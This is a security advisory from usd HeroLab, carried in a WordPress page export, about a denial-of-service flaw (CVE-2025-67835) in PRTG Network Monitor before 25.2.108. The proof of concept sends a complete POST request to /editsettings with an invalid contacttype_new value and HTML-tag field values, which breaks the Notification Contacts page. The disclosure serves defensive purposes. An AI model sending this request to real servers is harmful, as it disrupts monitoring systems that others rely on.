{"id":24763,"date":"2026-01-19T16:30:00","date_gmt":"2026-01-19T15:30:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=24763"},"modified":"2026-01-22T15:01:58","modified_gmt":"2026-01-22T14:01:58","slug":"usd-2025-0041","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0041\/","title":{"rendered":"usd-2025-0041"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.5\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

<\/h1>\n

 <\/p>\n

usd-2025-41 | PRTG Network Monitor 25.2.108 - DoS of Functionality<\/h1>\n

<\/h1>\n

Product<\/strong>: PRTG Network Monitor
Affected Version<\/strong>: <25.2.108
Vulnerability Type<\/strong>: Uncontrolled Resource Consumption (CWE-400)
Security Risk<\/strong>: Low
Vendor<\/strong>: Paessler
Vendor URL<\/strong>: https:\/\/www.paessler.com\/de<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2025-67835
CVE Link<\/strong>: https:\/\/www.cve.org\/CVERecord?id=CVE-2025-67835<\/a>
Advisory ID<\/strong>: usd-2025-41<\/p>\n

Description<\/h3>\n

The application is vulnerable to denial of service attacks (DoS), which may lead to impairment or failure of a specific function.
Unexpected values can result in incorrect or flawed behavior.
If not properly catched by the application, resulting errors could impair specific functionalities or propagate to the entire application.<\/p>\n

Proof of Concept<\/h3>\n

Sending a request with an invalid value for the parameter contacttype_new<\/strong> to the endpoint \/editsettings<\/strong> while creating a new notification contact results in the page \"Notification Contacts\" becoming corrupted, rendering it useless.<\/p>\n

When creating a new notification contact, a request like the following is sent:<\/p>\n

Request<\/strong><\/p>\n

\n
<\/span>POST<\/span> \/editsettings<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> [REDACTED]
<\/span>Cookie<\/span>:<\/span> OCTOPUSdf4605ecf5b01f444ca122f3f2b012a0b3a5086d=[REDACTED]
<\/span>[...]<\/span><\/pre>\n
description_new=New+Description&recipient_new=New+Recipient&status_=&objecttype=contact&
subid=new&id=24243&contacttype_new=1&status_new=1<\/p>\n
 <\/p>\n<\/div>\n
The value for the parameter contacttype_new<\/strong> indicates which type of contact is being added (e.g. e-mail, SMS or push-notification). If an invalid value is used for this parameter, the overview page \"Notification Contacts\" becomes corrupted and is no longer usable.<\/p>\n
Corrupting Request<\/strong><\/p>\n
\n
<\/span>POST<\/span> \/editsettings<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> [REDACTED]
<\/span>Cookie<\/span>:<\/span> OCTOPUSdf4605ecf5b01f444ca122f3f2b012a0b3a5086d=[REDACTED]
<\/span>[...]<\/span><\/pre>\n
description_new=<h1><\/h1>&recipient_new=%3Ch1%3EPentest%3C%2Fh1%3E&status_=&objecttype=contact&
subid=new&id=24243&contacttype_new=11&status_new=1<\/p>\n
 <\/p>\n<\/div>\n
After the request was sent, the page \"Notification Contacts\" became unusable as only the error message [Error CA: EInvalidPointer in \/controls\/]<\/strong> was shown.<\/p>\n
\"\"<\/p>\n
Fix<\/h3>\n
Functionalities should be hardened such that individual errors do not impair the entire functionality.
Furthermore, inputs should be validated beforehand to prevent potential incorrect behavior.<\/p>\n
References<\/h3>\n